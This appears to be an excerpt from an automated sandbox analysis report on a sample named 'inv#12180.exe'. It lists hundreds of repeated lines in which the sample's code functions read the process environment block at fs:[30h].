              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01498402 mov eax, dword ptr fs:[00000030h]0_2_01498402
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01498402 mov eax, dword ptr fs:[00000030h]0_2_01498402
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01498402 mov eax, dword ptr fs:[00000030h]0_2_01498402
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145C427 mov eax, dword ptr fs:[00000030h]0_2_0145C427
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145E420 mov eax, dword ptr fs:[00000030h]0_2_0145E420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145E420 mov eax, dword ptr fs:[00000030h]0_2_0145E420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145E420 mov eax, dword ptr fs:[00000030h]0_2_0145E420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6420 mov eax, dword ptr fs:[00000030h]0_2_014E6420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6420 mov eax, dword ptr fs:[00000030h]0_2_014E6420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6420 mov eax, dword ptr fs:[00000030h]0_2_014E6420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6420 mov eax, dword ptr fs:[00000030h]0_2_014E6420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6420 mov eax, dword ptr fs:[00000030h]0_2_014E6420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6420 mov eax, dword ptr fs:[00000030h]0_2_014E6420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E6420 mov eax, dword ptr fs:[00000030h]0_2_014E6420
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A430 mov eax, dword ptr fs:[00000030h]0_2_0149A430
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014604E5 mov ecx, dword ptr fs:[00000030h]0_2_014604E5
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0151A49A mov eax, dword ptr fs:[00000030h]0_2_0151A49A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014664AB mov eax, dword ptr fs:[00000030h]0_2_014664AB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014944B0 mov ecx, dword ptr fs:[00000030h]0_2_014944B0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EA4B0 mov eax, dword ptr fs:[00000030h]0_2_014EA4B0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149674D mov esi, dword ptr fs:[00000030h]0_2_0149674D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149674D mov eax, dword ptr fs:[00000030h]0_2_0149674D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149674D mov eax, dword ptr fs:[00000030h]0_2_0149674D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EE75D mov eax, dword ptr fs:[00000030h]0_2_014EE75D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460750 mov eax, dword ptr fs:[00000030h]0_2_01460750
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2750 mov eax, dword ptr fs:[00000030h]0_2_014A2750
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2750 mov eax, dword ptr fs:[00000030h]0_2_014A2750
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E4755 mov eax, dword ptr fs:[00000030h]0_2_014E4755
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468770 mov eax, dword ptr fs:[00000030h]0_2_01468770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470770 mov eax, dword ptr fs:[00000030h]0_2_01470770
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C700 mov eax, dword ptr fs:[00000030h]0_2_0149C700
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460710 mov eax, dword ptr fs:[00000030h]0_2_01460710
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01490710 mov eax, dword ptr fs:[00000030h]0_2_01490710
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C720 mov eax, dword ptr fs:[00000030h]0_2_0149C720
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C720 mov eax, dword ptr fs:[00000030h]0_2_0149C720
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149273C mov eax, dword ptr fs:[00000030h]0_2_0149273C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149273C mov ecx, dword ptr fs:[00000030h]0_2_0149273C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149273C mov eax, dword ptr fs:[00000030h]0_2_0149273C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DC730 mov eax, dword ptr fs:[00000030h]0_2_014DC730
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146C7C0 mov eax, dword ptr fs:[00000030h]0_2_0146C7C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E07C3 mov eax, dword ptr fs:[00000030h]0_2_014E07C3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014827ED mov eax, dword ptr fs:[00000030h]0_2_014827ED
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014827ED mov eax, dword ptr fs:[00000030h]0_2_014827ED
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014827ED mov eax, dword ptr fs:[00000030h]0_2_014827ED
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EE7E1 mov eax, dword ptr fs:[00000030h]0_2_014EE7E1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014647FB mov eax, dword ptr fs:[00000030h]0_2_014647FB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014647FB mov eax, dword ptr fs:[00000030h]0_2_014647FB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150678E mov eax, dword ptr fs:[00000030h]0_2_0150678E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014607AF mov eax, dword ptr fs:[00000030h]0_2_014607AF
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_015147A0 mov eax, dword ptr fs:[00000030h]0_2_015147A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147C640 mov eax, dword ptr fs:[00000030h]0_2_0147C640
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A660 mov eax, dword ptr fs:[00000030h]0_2_0149A660
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A660 mov eax, dword ptr fs:[00000030h]0_2_0149A660
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152866E mov eax, dword ptr fs:[00000030h]0_2_0152866E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152866E mov eax, dword ptr fs:[00000030h]0_2_0152866E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01492674 mov eax, dword ptr fs:[00000030h]0_2_01492674
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE609 mov eax, dword ptr fs:[00000030h]0_2_014DE609
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147260B mov eax, dword ptr fs:[00000030h]0_2_0147260B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147260B mov eax, dword ptr fs:[00000030h]0_2_0147260B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147260B mov eax, dword ptr fs:[00000030h]0_2_0147260B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147260B mov eax, dword ptr fs:[00000030h]0_2_0147260B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147260B mov eax, dword ptr fs:[00000030h]0_2_0147260B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147260B mov eax, dword ptr fs:[00000030h]0_2_0147260B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147260B mov eax, dword ptr fs:[00000030h]0_2_0147260B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A2619 mov eax, dword ptr fs:[00000030h]0_2_014A2619
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0147E627 mov eax, dword ptr fs:[00000030h]0_2_0147E627
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01496620 mov eax, dword ptr fs:[00000030h]0_2_01496620
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01498620 mov eax, dword ptr fs:[00000030h]0_2_01498620
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146262C mov eax, dword ptr fs:[00000030h]0_2_0146262C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0149A6C7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A6C7 mov eax, dword ptr fs:[00000030h]0_2_0149A6C7
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE6F2 mov eax, dword ptr fs:[00000030h]0_2_014DE6F2
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE6F2 mov eax, dword ptr fs:[00000030h]0_2_014DE6F2
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE6F2 mov eax, dword ptr fs:[00000030h]0_2_014DE6F2
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE6F2 mov eax, dword ptr fs:[00000030h]0_2_014DE6F2
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E06F1 mov eax, dword ptr fs:[00000030h]0_2_014E06F1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E06F1 mov eax, dword ptr fs:[00000030h]0_2_014E06F1
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01464690 mov eax, dword ptr fs:[00000030h]0_2_01464690
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01464690 mov eax, dword ptr fs:[00000030h]0_2_01464690
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C6A6 mov eax, dword ptr fs:[00000030h]0_2_0149C6A6
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014966B0 mov eax, dword ptr fs:[00000030h]0_2_014966B0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E0946 mov eax, dword ptr fs:[00000030h]0_2_014E0946
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A096E mov eax, dword ptr fs:[00000030h]0_2_014A096E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A096E mov edx, dword ptr fs:[00000030h]0_2_014A096E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014A096E mov eax, dword ptr fs:[00000030h]0_2_014A096E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01504978 mov eax, dword ptr fs:[00000030h]0_2_01504978
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01504978 mov eax, dword ptr fs:[00000030h]0_2_01504978
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01486962 mov eax, dword ptr fs:[00000030h]0_2_01486962
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01486962 mov eax, dword ptr fs:[00000030h]0_2_01486962
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01486962 mov eax, dword ptr fs:[00000030h]0_2_01486962
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EC97C mov eax, dword ptr fs:[00000030h]0_2_014EC97C
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE908 mov eax, dword ptr fs:[00000030h]0_2_014DE908
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DE908 mov eax, dword ptr fs:[00000030h]0_2_014DE908
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EC912 mov eax, dword ptr fs:[00000030h]0_2_014EC912
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01458918 mov eax, dword ptr fs:[00000030h]0_2_01458918
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01458918 mov eax, dword ptr fs:[00000030h]0_2_01458918
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E892A mov eax, dword ptr fs:[00000030h]0_2_014E892A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F892B mov eax, dword ptr fs:[00000030h]0_2_014F892B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152A9D3 mov eax, dword ptr fs:[00000030h]0_2_0152A9D3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F69C0 mov eax, dword ptr fs:[00000030h]0_2_014F69C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A9D0 mov eax, dword ptr fs:[00000030h]0_2_0146A9D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A9D0 mov eax, dword ptr fs:[00000030h]0_2_0146A9D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A9D0 mov eax, dword ptr fs:[00000030h]0_2_0146A9D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A9D0 mov eax, dword ptr fs:[00000030h]0_2_0146A9D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A9D0 mov eax, dword ptr fs:[00000030h]0_2_0146A9D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0146A9D0 mov eax, dword ptr fs:[00000030h]0_2_0146A9D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014949D0 mov eax, dword ptr fs:[00000030h]0_2_014949D0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EE9E0 mov eax, dword ptr fs:[00000030h]0_2_014EE9E0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014929F9 mov eax, dword ptr fs:[00000030h]0_2_014929F9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014929F9 mov eax, dword ptr fs:[00000030h]0_2_014929F9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014729A0 mov eax, dword ptr fs:[00000030h]0_2_014729A0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014609AD mov eax, dword ptr fs:[00000030h]0_2_014609AD
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014609AD mov eax, dword ptr fs:[00000030h]0_2_014609AD
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E89B3 mov esi, dword ptr fs:[00000030h]0_2_014E89B3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E89B3 mov eax, dword ptr fs:[00000030h]0_2_014E89B3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014E89B3 mov eax, dword ptr fs:[00000030h]0_2_014E89B3
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01472840 mov ecx, dword ptr fs:[00000030h]0_2_01472840
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01490854 mov eax, dword ptr fs:[00000030h]0_2_01490854
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01464859 mov eax, dword ptr fs:[00000030h]0_2_01464859
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01464859 mov eax, dword ptr fs:[00000030h]0_2_01464859
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EE872 mov eax, dword ptr fs:[00000030h]0_2_014EE872
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EE872 mov eax, dword ptr fs:[00000030h]0_2_014EE872
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F6870 mov eax, dword ptr fs:[00000030h]0_2_014F6870
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F6870 mov eax, dword ptr fs:[00000030h]0_2_014F6870
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EC810 mov eax, dword ptr fs:[00000030h]0_2_014EC810
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150483A mov eax, dword ptr fs:[00000030h]0_2_0150483A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150483A mov eax, dword ptr fs:[00000030h]0_2_0150483A
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149A830 mov eax, dword ptr fs:[00000030h]0_2_0149A830
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01482835 mov eax, dword ptr fs:[00000030h]0_2_01482835
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01482835 mov eax, dword ptr fs:[00000030h]0_2_01482835
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01482835 mov eax, dword ptr fs:[00000030h]0_2_01482835
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01482835 mov ecx, dword ptr fs:[00000030h]0_2_01482835
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01482835 mov eax, dword ptr fs:[00000030h]0_2_01482835
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01482835 mov eax, dword ptr fs:[00000030h]0_2_01482835
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148E8C0 mov eax, dword ptr fs:[00000030h]0_2_0148E8C0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C8F9 mov eax, dword ptr fs:[00000030h]0_2_0149C8F9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149C8F9 mov eax, dword ptr fs:[00000030h]0_2_0149C8F9
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152A8E4 mov eax, dword ptr fs:[00000030h]0_2_0152A8E4
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460887 mov eax, dword ptr fs:[00000030h]0_2_01460887
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014EC89D mov eax, dword ptr fs:[00000030h]0_2_014EC89D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150EB50 mov eax, dword ptr fs:[00000030h]0_2_0150EB50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F6B40 mov eax, dword ptr fs:[00000030h]0_2_014F6B40
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014F6B40 mov eax, dword ptr fs:[00000030h]0_2_014F6B40
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0152AB40 mov eax, dword ptr fs:[00000030h]0_2_0152AB40
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01508B42 mov eax, dword ptr fs:[00000030h]0_2_01508B42
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01514B4B mov eax, dword ptr fs:[00000030h]0_2_01514B4B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01514B4B mov eax, dword ptr fs:[00000030h]0_2_01514B4B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0145CB7E mov eax, dword ptr fs:[00000030h]0_2_0145CB7E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DEB1D mov eax, dword ptr fs:[00000030h]0_2_014DEB1D
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148EB20 mov eax, dword ptr fs:[00000030h]0_2_0148EB20
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148EB20 mov eax, dword ptr fs:[00000030h]0_2_0148EB20
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01528B28 mov eax, dword ptr fs:[00000030h]0_2_01528B28
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01528B28 mov eax, dword ptr fs:[00000030h]0_2_01528B28
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150EBD0 mov eax, dword ptr fs:[00000030h]0_2_0150EBD0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01480BCB mov eax, dword ptr fs:[00000030h]0_2_01480BCB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01480BCB mov eax, dword ptr fs:[00000030h]0_2_01480BCB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01480BCB mov eax, dword ptr fs:[00000030h]0_2_01480BCB
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460BCD mov eax, dword ptr fs:[00000030h]0_2_01460BCD
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460BCD mov eax, dword ptr fs:[00000030h]0_2_01460BCD
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01460BCD mov eax, dword ptr fs:[00000030h]0_2_01460BCD
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148EBFC mov eax, dword ptr fs:[00000030h]0_2_0148EBFC
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468BF0 mov eax, dword ptr fs:[00000030h]0_2_01468BF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468BF0 mov eax, dword ptr fs:[00000030h]0_2_01468BF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01468BF0 mov eax, dword ptr fs:[00000030h]0_2_01468BF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014ECBF0 mov eax, dword ptr fs:[00000030h]0_2_014ECBF0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01514BB0 mov eax, dword ptr fs:[00000030h]0_2_01514BB0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01514BB0 mov eax, dword ptr fs:[00000030h]0_2_01514BB0
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470BBE mov eax, dword ptr fs:[00000030h]0_2_01470BBE
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470BBE mov eax, dword ptr fs:[00000030h]0_2_01470BBE
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466A50 mov eax, dword ptr fs:[00000030h]0_2_01466A50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466A50 mov eax, dword ptr fs:[00000030h]0_2_01466A50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466A50 mov eax, dword ptr fs:[00000030h]0_2_01466A50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466A50 mov eax, dword ptr fs:[00000030h]0_2_01466A50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466A50 mov eax, dword ptr fs:[00000030h]0_2_01466A50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466A50 mov eax, dword ptr fs:[00000030h]0_2_01466A50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01466A50 mov eax, dword ptr fs:[00000030h]0_2_01466A50
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470A5B mov eax, dword ptr fs:[00000030h]0_2_01470A5B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01470A5B mov eax, dword ptr fs:[00000030h]0_2_01470A5B
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149CA6F mov eax, dword ptr fs:[00000030h]0_2_0149CA6F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149CA6F mov eax, dword ptr fs:[00000030h]0_2_0149CA6F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149CA6F mov eax, dword ptr fs:[00000030h]0_2_0149CA6F
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0150EA60 mov eax, dword ptr fs:[00000030h]0_2_0150EA60
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DCA72 mov eax, dword ptr fs:[00000030h]0_2_014DCA72
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014DCA72 mov eax, dword ptr fs:[00000030h]0_2_014DCA72
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014ECA11 mov eax, dword ptr fs:[00000030h]0_2_014ECA11
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0148EA2E mov eax, dword ptr fs:[00000030h]0_2_0148EA2E
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149CA24 mov eax, dword ptr fs:[00000030h]0_2_0149CA24
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_0149CA38 mov eax, dword ptr fs:[00000030h]0_2_0149CA38
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01484A35 mov eax, dword ptr fs:[00000030h]0_2_01484A35
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_01484A35 mov eax, dword ptr fs:[00000030h]0_2_01484A35
              Source: C:\Users\user\Desktop\inv#12180.exeCode function: 0_2_014B6ACC mov eax, dword ptr fs:[00000030h]0_2_014B6ACC
